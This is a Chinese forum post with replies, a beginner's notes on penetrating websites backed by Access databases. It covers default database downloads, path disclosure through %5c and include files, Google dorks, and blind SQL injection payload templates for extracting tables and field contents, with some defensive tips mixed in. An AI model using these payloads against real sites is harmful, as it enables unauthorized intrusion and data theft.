首页
社区
课程
招聘
[原创]使用Access数据库站点的渗透思路
发表于: 2010-10-31 19:03 8233

[原创]使用Access数据库站点的渗透思路

2010-10-31 19:03
8233
小弟初学渗透 有什么不对的地方请高人们指教 感激不尽QQ:253651745

1、网站使用整套的开源代码,没有更改数据库的路径 就会产生默认数据库下载。
   方法:怎样判断一个网站使用的开源版本:版权声明 源码中注释信息
   防御:修改默认数据库的文件名和路径名 可以更改为特殊少见的名字 同时使用# 防止直接下载 (但是不可靠%23就可以解决了)或者改成asp后缀(但是可以使用迅雷等软件下载 然后重新命名即可  这样的数据库也可能被插入一句话木马 成为一句话的服务器危害更大)

2、对于数据库连接信息没有隐藏,导致数据库路径泄漏 即暴库
   方法:直接使用google 关键词 (汽车、美容、旅游等等)server.mapPath(".mdb")就可以搜索出大量的可以报出数据库信息的网站,针对一个网站可能通过robots.txt 可能查出数据库路径,(应该下载搜索的范围 User-agent: * Allow: /data/*.htm 只允许访问.htm文件)当然这个robots.txt是个双刃剑 还可能报出很多有用信息 如果使用不当
   %5c暴库:将url的最后一个/改成%5c即\ url不会转义,而IIS以\表示真实的目录关系,以/表示虚拟路径。当IIS获取某个目录时,如果碰到\符号,则将\符号之后的路径作为物理的绝对路径,而忽略\符号之前的路径信息,因此产生找不到指定文件的错误。 显示出网站数据库的路径信息。当然完整的数据库信息还要加上 %5c之前的路径 当然暴三级目录比暴二级目录成功概率高,因为二级目录可能是虚拟目录
  conn.asp暴库:
  <!--include file='conn.inc'-->  可以直接查看conn.inc文件 看到数据库连接信息
   防御:将数据库连接信息,放到单独文件中如conn.asp 在使用文件中 直接进入<!-- include file="conn.asp" --> 避免在源码中看到连接数据库语句信息
  处理异常信息

sql注入
判断注入点 ' / and 1>0 / and 1<0  主要后面就是真或者假的就可以
猜表:    ?id=1 and exists(select * from 表名)  正常时有该表
猜字段:   ?id=1 and (select count(字段) from 表名)>=0  
猜长度:   ?id=1 and (select top 1 len(字段) from 表名)>*  确定长度
猜内容:   ?id=1 and (select top 1 asc(mid(字段,N,1)) from 表名)>* 确定asc码
            Ascii 0-9 48-57
            Ascii a-z 97-122
            Ascii A-Z 65-90
          ?id=1 and (select top 1 mid(字段,N,1) from 表名) ='g' 直接获得字符内容  如果是汉字内容 可以读取第一汉字 若使用asc 则返回的是负值 则怎么猜解汉字 还没有解决??

枚举所有内容:
   利用条件过滤:?id=1 and (select top 1 len(字段) from 表名 where  字段 not in ('查询结果1','查询结果2'))>*
   利用排序操作:select top 1 字段1 from (select top N 字段1,id from 表名 order by id asc) T order by id desc

[课程]Linux pwn 探索篇!

收藏
免费 0
支持
分享
最新回复 (9)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
还有很多没谈到,比如判断操作系统,系统目录,使用Access暴力获取网站路径等方法,楼主可以研究一下
2010-11-8 12:43
0
雪    币: 87
活跃值: (25)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
3
嗯 希望 大家 一起来完善
2010-11-26 11:04
0
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
%5c暴库很老了,现在基本都会有一条:on error resume next,除非写代码的人疏忽。
还有注入的话,一般get型的没多大意思,除非限制很BT。LZ可以研究下post型的,比如搜索框带注的,此外还有XML注入,二阶注入之类的,不过二阶黑盒比较难发现,另外各种数据库及其版本不同的话所对应手法也不同~~
呵呵,菜鸟之言,不对的地方望大牛指正
2011-3-19 21:20
0
雪    币: 1681
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
itf
5
这个数据库研究的人多了;漏洞相对也就解的多
2011-3-30 08:41
0
雪    币: 79
活跃值: (35)
能力值: ( LV2,RANK:150 )
在线值:
发帖
回帖
粉丝
6
改后缀名,数据库文件放到站点以外,这是基本的安全手段
2012-4-25 15:22
0
雪    币: 155
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
初入WEB学习下
2012-12-18 13:28
0
雪    币: 85
活跃值: (37)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
这必须要学习啊。
2012-12-22 12:47
0
雪    币: 251
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
学习了!但是一般access数据库用处不大啊!
2012-12-24 14:50
0
雪    币: 60
活跃值: (21)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
10
说实话啊 这个思路和access没多大关系 可以下载的毕竟也不是太多
2013-1-4 14:51
0
游客
登录 | 注册 方可回帖
返回
//